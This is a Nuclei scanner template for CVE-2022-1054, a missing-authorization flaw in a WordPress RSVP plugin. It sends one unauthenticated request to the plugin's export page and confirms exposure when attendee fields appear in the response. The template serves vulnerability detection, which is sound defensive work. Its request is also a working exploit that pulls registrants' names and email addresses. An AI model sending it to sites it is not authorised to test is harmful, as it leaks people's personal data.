nuclei-templates/cves/2022/CVE-2022-1054.yaml

36 lines
1.1 KiB
YAML

id: CVE-2022-1054
info:
name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
author: Akincibor
severity: medium
description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
reference:
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-1054
cwe-id: CWE-862
tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'RSVP Status'
- '"First Name"'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2023/04/06